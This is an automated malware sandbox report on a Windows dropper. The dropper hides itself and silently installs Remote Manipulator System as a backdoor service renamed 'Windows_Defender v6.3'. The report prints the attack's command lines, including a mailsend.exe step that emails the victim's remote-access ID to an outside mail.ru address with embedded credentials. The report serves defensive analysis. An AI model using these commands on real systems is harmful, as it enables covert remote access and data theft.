Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-09-2024 09:51
Static task
static1
Behavioral task
behavioral1
Sample
de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe
Resource
win7-20240903-en
General
-
Target
de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe
-
Size
4.5MB
-
MD5
de2a25f8ead1eab33b2648789c06531f
-
SHA1
24da52206a2b4a09ef84da764cd4550e5ffb7cec
-
SHA256
793135f920a0b239cff6880c6d9b939a5e2f26e11c063ce1b3b1f35c30e27aff
-
SHA512
63f5c043a8128bb406cc67bf5329d61f7eb21c9052deddb143badb2fd830565635e4738cce80190766a8f914ca0f3265818e3985967b3033d9668c29dd1f8ea0
-
SSDEEP
98304:HKF7KQF1iEaGzM038RzYf0ML2x5tTDaLclizt5CJ:HS7KQrLM/RzYI7Da4Ic
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exepid process 1308 attrib.exe 4916 attrib.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Program Files (x86)\System\vp8encoder.dll acprotect C:\Program Files (x86)\System\vp8decoder.dll acprotect -
Processes:
resource yara_rule C:\Program Files (x86)\System\rutserv.exe aspack_v212_v242 C:\Program Files (x86)\System\rfusclient.exe aspack_v212_v242 -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 8 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.exemailsend.exepid process 1520 rutserv.exe 540 rutserv.exe 4028 rutserv.exe 4632 rutserv.exe 3648 rfusclient.exe 3080 rfusclient.exe 4644 rfusclient.exe 3916 mailsend.exe -
Processes:
resource yara_rule C:\Program Files (x86)\System\vp8encoder.dll upx C:\Program Files (x86)\System\vp8decoder.dll upx -
Drops file in Program Files directory 35 IoCs
Processes:
de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exeattrib.exeattrib.exeattrib.exeattrib.exereg.exeattrib.exeattrib.exeattrib.exedescription ioc process File created C:\Program Files (x86)\System\mailsend.exe de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System attrib.exe File opened for modification C:\Program Files (x86)\System\vp8encoder.dll attrib.exe File opened for modification C:\Program Files (x86)\System\regedit.reg attrib.exe File opened for modification C:\Program Files (x86)\System\install.bat attrib.exe File opened for modification C:\Program Files (x86)\System\regedit.reg de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File created C:\Program Files (x86)\System\__tmp_rar_sfx_access_check_240616953 de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\mailsend.exe attrib.exe File opened for modification C:\Program Files (x86)\System\rfusclient.exe attrib.exe File opened for modification C:\Program Files (x86)\System\vp8decoder.dll attrib.exe File opened for modification C:\Program Files (x86)\System de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.vbs de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\rutserv.exe de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.bat attrib.exe File created C:\Program Files (x86)\System\id.txt reg.exe File opened for modification C:\Program Files (x86)\System\id.txt attrib.exe File created C:\Program Files (x86)\System\install.vbs de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.vbs attrib.exe File opened for modification C:\Program Files (x86)\System\install.vbs attrib.exe File created C:\Program Files (x86)\System\rutserv.exe de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File created C:\Program Files (x86)\System\vp8encoder.dll de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\vp8encoder.dll de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File created C:\Program Files (x86)\System\rfusclient.exe de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\mailsend.exe de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\install.bat de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Common Files\System attrib.exe File opened for modification C:\Program Files (x86)\System\rutserv.exe attrib.exe File opened for modification C:\Program Files (x86)\System\vp8decoder.dll de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\mailsend.exe attrib.exe File opened for modification C:\Program Files (x86)\System\id.txt reg.exe File created C:\Program Files (x86)\System\install.bat de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File created C:\Program Files (x86)\System\regedit.reg de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\rfusclient.exe de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\System\regedit.reg attrib.exe File created C:\Program Files (x86)\System\vp8decoder.dll de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 4556 sc.exe 1452 sc.exe 740 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WScript.exetaskkill.exeattrib.exerutserv.exerutserv.exesc.exesc.exerfusclient.exeattrib.exemailsend.exeattrib.exeattrib.exetaskkill.exetimeout.exerutserv.exerfusclient.exede2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exetaskkill.exereg.exeattrib.exeattrib.exerfusclient.exesc.exetimeout.execmd.exetaskkill.exeregedit.exereg.exeattrib.exerutserv.exetimeout.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mailsend.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 1700 timeout.exe 2056 timeout.exe 2200 timeout.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5020 taskkill.exe 2960 taskkill.exe 4972 taskkill.exe 3456 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe -
Runs .reg file with regedit 1 IoCs
Processes:
regedit.exepid process 1388 regedit.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exemailsend.exepid process 1520 rutserv.exe 1520 rutserv.exe 1520 rutserv.exe 1520 rutserv.exe 1520 rutserv.exe 1520 rutserv.exe 540 rutserv.exe 540 rutserv.exe 4028 rutserv.exe 4028 rutserv.exe 4632 rutserv.exe 4632 rutserv.exe 4632 rutserv.exe 4632 rutserv.exe 4632 rutserv.exe 4632 rutserv.exe 3648 rfusclient.exe 3648 rfusclient.exe 3916 mailsend.exe 3916 mailsend.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 4644 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exerutserv.exerutserv.exerutserv.exedescription pid process Token: SeDebugPrivilege 5020 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 4972 taskkill.exe Token: SeDebugPrivilege 3456 taskkill.exe Token: SeDebugPrivilege 1520 rutserv.exe Token: SeDebugPrivilege 4028 rutserv.exe Token: SeTakeOwnershipPrivilege 4632 rutserv.exe Token: SeTcbPrivilege 4632 rutserv.exe Token: SeTcbPrivilege 4632 rutserv.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 1520 rutserv.exe 540 rutserv.exe 4028 rutserv.exe 4632 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exeWScript.execmd.exerutserv.exerfusclient.exedescription pid process target process PID 3520 wrote to memory of 2124 3520 de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe WScript.exe PID 3520 wrote to memory of 2124 3520 de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe WScript.exe PID 3520 wrote to memory of 2124 3520 de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 3344 2124 WScript.exe cmd.exe PID 2124 wrote to memory of 3344 2124 WScript.exe cmd.exe PID 2124 wrote to memory of 3344 2124 WScript.exe cmd.exe PID 3344 wrote to memory of 1308 3344 cmd.exe attrib.exe PID 3344 wrote to memory of 1308 3344 cmd.exe attrib.exe PID 3344 wrote to memory of 1308 3344 cmd.exe attrib.exe PID 3344 wrote to memory of 4916 3344 cmd.exe attrib.exe PID 3344 wrote to memory of 4916 3344 cmd.exe attrib.exe PID 3344 wrote to memory of 4916 3344 cmd.exe attrib.exe PID 3344 wrote to memory of 5020 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 5020 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 5020 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 2960 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 2960 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 2960 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 4972 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 4972 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 4972 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 3456 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 3456 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 3456 3344 cmd.exe taskkill.exe PID 3344 wrote to memory of 2296 3344 cmd.exe reg.exe PID 3344 wrote to memory of 2296 3344 cmd.exe reg.exe PID 3344 wrote to memory of 2296 3344 cmd.exe reg.exe PID 3344 wrote to memory of 1388 3344 cmd.exe regedit.exe PID 3344 wrote to memory of 1388 3344 cmd.exe regedit.exe PID 3344 wrote to memory of 1388 3344 cmd.exe regedit.exe PID 3344 wrote to memory of 1700 3344 cmd.exe timeout.exe PID 3344 wrote to memory of 1700 3344 cmd.exe timeout.exe PID 3344 wrote to memory of 1700 3344 cmd.exe timeout.exe PID 3344 wrote to memory of 1520 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 1520 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 1520 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 540 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 540 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 540 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 4028 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 4028 3344 cmd.exe rutserv.exe PID 3344 wrote to memory of 4028 3344 cmd.exe rutserv.exe PID 4632 wrote to memory of 3080 4632 rutserv.exe rfusclient.exe PID 4632 wrote to memory of 3080 4632 rutserv.exe rfusclient.exe PID 4632 wrote to memory of 3080 4632 rutserv.exe rfusclient.exe PID 4632 wrote to memory of 3648 4632 rutserv.exe rfusclient.exe PID 4632 wrote to memory of 3648 4632 rutserv.exe rfusclient.exe PID 4632 wrote to memory of 3648 4632 rutserv.exe rfusclient.exe PID 3344 wrote to memory of 740 3344 cmd.exe sc.exe PID 3344 wrote to memory of 740 3344 cmd.exe sc.exe PID 3344 wrote to memory of 740 3344 cmd.exe sc.exe PID 3344 wrote to memory of 1452 3344 cmd.exe sc.exe PID 3344 wrote to memory of 1452 3344 cmd.exe sc.exe PID 3344 wrote to memory of 1452 3344 cmd.exe sc.exe PID 3344 wrote to memory of 4556 3344 cmd.exe sc.exe PID 3344 wrote to memory of 4556 3344 cmd.exe sc.exe PID 3344 wrote to memory of 4556 3344 cmd.exe sc.exe PID 3344 wrote to memory of 2056 3344 cmd.exe timeout.exe PID 3344 wrote to memory of 2056 3344 cmd.exe timeout.exe PID 3344 wrote to memory of 2056 3344 cmd.exe timeout.exe PID 3648 wrote to memory of 4644 3648 rfusclient.exe rfusclient.exe PID 3648 wrote to memory of 4644 3648 rfusclient.exe rfusclient.exe PID 3648 wrote to memory of 4644 3648 rfusclient.exe rfusclient.exe PID 3344 wrote to memory of 3152 3344 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 7 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1308 attrib.exe 4916 attrib.exe 2884 attrib.exe 4200 attrib.exe 1932 attrib.exe 3656 attrib.exe 644 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System" +H +S /S /D4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1308
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\*.*" +H +S /S /D4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\SysWOW64\taskkill.exeTaskkill /f /im rutserv.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\SysWOW64\taskkill.exeTaskkill /f /im rfusclient.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
- System Location Discovery: System Language Discovery
PID:2296
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1388
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1700
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /silentinstall4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1520
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /firewall4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:540
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /start4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4028
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10004⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:740
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1452
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Windows_Defender v6.3"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4556
-
-
C:\Windows\SysWOW64\timeout.exetimeout 1204⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2056
-
-
C:\Windows\SysWOW64\reg.exereg export "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4" "id.txt"4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3152
-
-
C:\Windows\SysWOW64\timeout.exetimeout 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2200
-
-
C:\Program Files (x86)\System\mailsend.exemailsend.exe -t [email protected] -attach id.txt,application/txt -sub "RMS" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS" -ssl -auth-login -user [email protected] -pass 251103olin -q4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3916
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\regedit.reg" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2884
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\mailsend.exe" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4200
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\id.txt" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1932
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\install.vbs" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3656
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\System\install.bat" -S -H /S /D4⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:644
-
-
-
-
C:\Program Files (x86)\System\rutserv.exe"C:\Program Files (x86)\System\rutserv.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:4644
-
-
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3080
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53a00cb0db76a38b673ef3e40a250e331
SHA1d0c2d511af06b1cf447d8ad05ca6c9e7afaf6e1e
SHA2568f39fafe34285c8f14cbf4b851d84f13495097869cea061c05c1fcdff5c47b7f
SHA51239a1f80fdc5566f7e5ba40e9ae245030d29fa4f9f3d6060f0cb878bd2341c47c915bda7c36aecf4382c4565326a2c6fce2742b5b86a389cf008790e0a3d5407b
-
Filesize
120B
MD5c719a030434d3fa96d62868f27e904a6
SHA1f2f750a752dd1fda8915a47b082af7cf2d3e3655
SHA2562696ee4302a85c6b4101fc6d1ce8e38b94fd9c2bbd1acc73b553576b3aacb92f
SHA51247a9367f7596d19c0636766cd34ca3701d3b1239a284f2333fd04a48422f53b0df21002fd38a4f229f6a2f9f9e8163267e13ecb24d9ce6de1863d5f59ab04ff0
-
Filesize
1.2MB
MD5ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
Filesize
12KB
MD5251212852a073e6fc5fbe3af92f66adb
SHA16ee07cb20f57830325c11867e68fea49ae0e87ea
SHA256f2c83f4cc13b0cd28090dd128ec5ff221681118f6100eddaead88526070ceecb
SHA512f3853ece99edc6d39edbf1c7bca471e71aa034684a85358b033e50418ffa061f1e8724cba76065048901c20c9f9a6dbd86a17ee33756c0452d4d3358047296be
-
Filesize
1.5MB
MD5b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
Filesize
1.7MB
MD537a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
Filesize
155KB
MD588318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
Filesize
593KB
MD56298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
Filesize
20KB
MD54c8339fff773238e20a411f3f69944e6
SHA15eef38dd7565a6dfbfea96cc3c253dc8e34bbc0c
SHA2563636426df758336adb13484c29fbcec868cc4c6c7735b341903751d7199bd4ff
SHA51263aef088c6dcca7a9b1776acc79f5e1ba159747ef1591ba2b81d19a849c2e120231634ed048b474f463e69f3904c1668977b12f027a29971b597a30af8f5f529
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e